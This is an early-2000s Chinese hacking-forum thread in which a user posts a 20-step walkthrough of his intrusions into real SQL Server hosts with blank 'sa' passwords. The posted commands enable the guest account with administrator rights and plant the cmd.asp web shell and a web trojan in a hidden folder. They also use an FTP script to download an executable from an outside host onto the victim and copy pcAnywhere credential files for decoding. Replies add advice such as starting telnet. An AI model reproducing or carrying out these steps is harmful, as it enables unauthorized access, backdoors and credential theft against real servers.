lcx的win98下sa空密码入侵脚本20步[原创]

>> 欢迎您， 傲气雄鹰: 重登陆 | 退出 | 注册 | 资料 | 设置 | 排行 | 新贴 | 精华 | 管理 | 帮助

首页

小榕软件实验室

刀光雪影

■ 回复数：8　◆ 点击数：499

将此页发给您的朋友

作者

主题: lcx的win98下sa空密码入侵脚本20步[原创]

回复 | 收藏 | 打印 | 篇末

lcx

级别：高级站友
威望：0
经验：0
货币：461
体力：

来源：61.156.195.*
总发帖数：172
注册日期：2002-03-06

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

前言，这是我两天入侵两台sa空密码主机的真实总结:
1.如何找到sa空密码肉鸡？自己用流光扫吧。
2.注意这是在win98下入侵sa的真实情况。局域网中的win98，在网吧里。
3.工具：supersqlexec.exe、cmd.asp(www.sandflee.net有下)海阳顶端网木马(黑白)放在本机f:盘
4.用supersqlexec联接成功。在命令行中输入:
net user guest /active:yes
（>指肉鸡显示下同）The command completed successfully.
net user guest 123456
> The command completed successfully
net localgroup administrators guest /add
> The command completed successfully.
这几个命令做完后，意思是将guest用户激活，密码是123456，并提升为admin。
5.心中暗喜，下一步启动流光的种植者给它种个冰河。奇怪了，无论如何也不成功。
6.换个用户名吧。回到supersqlexe.exe的命令模式net user lcx 123456 /add，命令失败。服务器没开ipc$?
7.回到sqlexe命令行中net start lanmanserver肉鸡却显示ipc$已启动。为何在这一步流光联不上，我百思不得其解。我后来换wn2000的cmd下net use \\ip\ipc$ "123456" /user:"guest"也不能联接成功。
8.换个思路吧。在本机上将f:设为共享,在dos下ipconfig.exe得知自己本机ip
9.回到sqlexe命令行中net use x: \\本机ip\f，将自己本机f：盘映射成为肉鸡的x:盘。过了一会，服务器显示命令成功完成。
10.sqlexe命令行中运行set得知其主页位置在d:\inetpub\wwwroot。不错，服务器支持asp.你如果看不懂这个命令，也可以根据其主页上某个图像文件名，然后dir *.jpg/s查找其主页位置。
11.sqlexe命令行中copy x:\cmd.asp d:\inetpub\wwwroot
12.回到ie中http://服务器ip/cmd.asp，出现了ie界面的dos.建个文件夹看看。md d:\inetpub\wwwroot\aspmm
13.sqlexec命令行中copy x:\海阳顶端网木马\*.* d:\inetpub\wwwroot\aspmm\.再将目录隐藏attrib +h d:\inetpub\wwwroot\aspmm
14.现在你可以用海阳顶端网木马上传任意文件了。完全控制了肉鸡的文本文件。当然你也可以通过映射来 copy.呀！这台服务器不支持fso，海阳顶端网木马无法运行。试一下ftp上传。先将自己的文件lcx.exe上传到个人主页空间。
15.在自己本机上建立up.txt内容如下：
open ftp1.go.163.com(我用得是网易ftp)
username(你的上传用户名)
password(密码)
get lcx.exe(你要上传到肉鸡的文件名)
bye(退出ftp)
通过映射copy到肉鸡的c:\up.txt
16.sqlexec命令行中ftp -s:c:\up.txt等一会你就看到lcx.exe已经在肉鸡在\winnt\system32\下了。
17.运气好的话应该可以ipc联接成功，开个端口进去的。然后就可以做个代理、做个跳板了，可惜我运气不好，这台机器无法ipc$成功，流光种植者无法联接。上传了好几个exe木马也无法运行。
18. 通过仔细查找，得知肉鸡装了pcanywhere.查*.cif，该文件却在C:/WINNT/Profiles/All Users/Application Data/Symantec/pcAnywhere这里，好深的目录。怎样copy它呢？
19.通过一天的dos8.3规则的补习才知应是这样 :copyc:\winnt\Profiles\alluse~1\applic~2\symantec\pcanyw~1\*.cif d:\inetpub\wwwroot\.然后通过 ie下载。
20.流光cif文件解码，得知用户名和密码。唯一遗憾的是ipc$无法成功，无法开端口进去，guest用户却可以激活不知什么原因，望高手指点。

----------------------------------------------------------
http://haiyangtop.126.com

编辑　

删除　

发表于 2002-04-23.21:51:54　

IP: 已记录

goldkiss 帅哥哦

级别：新手上路
威望：0
经验：0
货币：24
体力： 0.8

来源：61.166.241.*
总发帖数：9
注册日期：2002-04-23

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

net start tlntsvr
打開telnet在想辦法阿
呵呵...

编辑　

删除　

发表于 2002-04-23.22:11:55　

IP: 已记录

houmen 帅哥哦

级别：一般站友
威望：0
经验：0
货币：22
体力： 0.9

来源：湖北
总发帖数：11
注册日期：2002-03-17

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

你在网吧是98系统？？好象98系统不支持IPC

编辑　

删除　

发表于 2002-04-23.23:13:22　

IP: 已记录

卡那米

级别：新手上路
威望：0
经验：0
货币：124
体力：

来源：上海
总发帖数：8
注册日期：2002-04-23

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

楼上的同志********不是好象应该是就是啊********
—……#￥……）……￥#）……￥——……！！$——

编辑　

删除　

发表于 2002-04-24.00:45:14　

IP: 已记录

lcx

级别：高级站友
威望：0
经验：0
货币：461
体力：

来源：218.56.6.*
总发帖数：172
注册日期：2002-03-06

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

楼上的都没仔细看，我说后来换2000也不能ipc$

----------------------------------------------------------
http://haiyangtop.126.com

编辑　

删除　

发表于 2002-04-24.11:17:11　

IP: 已记录

X-Laser 帅哥哦

级别：长老级
威望：0
经验：0
货币：37
体力： 0.5

来源：218.0.252.*
总发帖数：628
注册日期：2002-02-10

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

哈哈哈哈什么年代的事情了新手连连入侵装98的sql的吧呵呵办法要自己想

编辑　

删除　

发表于 2002-04-24.13:25:58　

IP: 已记录

lcx

级别：高级站友
威望：0
经验：0
货币：461
体力：

来源：218.58.5.*
总发帖数：172
注册日期：2002-03-06

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

是用98入侵2000的sql!!! 这是非常困难的！！！楼上的长老！！！

----------------------------------------------------------
http://haiyangtop.126.com

编辑　

删除　

发表于 2002-04-24.13:53:25　

IP: 已记录

X-Laser 帅哥哦

级别：长老级
威望：0
经验：0
货币：37
体力： 0.5

来源：218.0.252.*
总发帖数：628
注册日期：2002-02-10

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

哈哈哈 98入侵2000sql还叫困难哈哈你试试入侵装98的sql吧哈哈那不是比登天还难呵呵

编辑　

删除　

发表于 2002-04-24.14:01:49　

IP: 已记录

-1

级别：骑士
威望：0
经验：0
货币：140
体力：

来源：202.201.82.*
总发帖数：272
注册日期：2002-02-20

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

输不进去命令行！！！

----------------------------------------------------------
傲品人生百味，笑看风云万维！！！

编辑　

删除　

发表于 2002-04-25.22:16:17　

IP: 已记录

选择回复

快速回复主题：	>>>高级模式
	用户名：没有注册？　密码：忘记密码？
记住密码 HTML语法禁止IDB代码禁止表情字符	[按 Ctrl+Enter 快捷键可直接提交帖子]
投票评分：	共 0 票

所有时间均为: 北京时间

↑TOP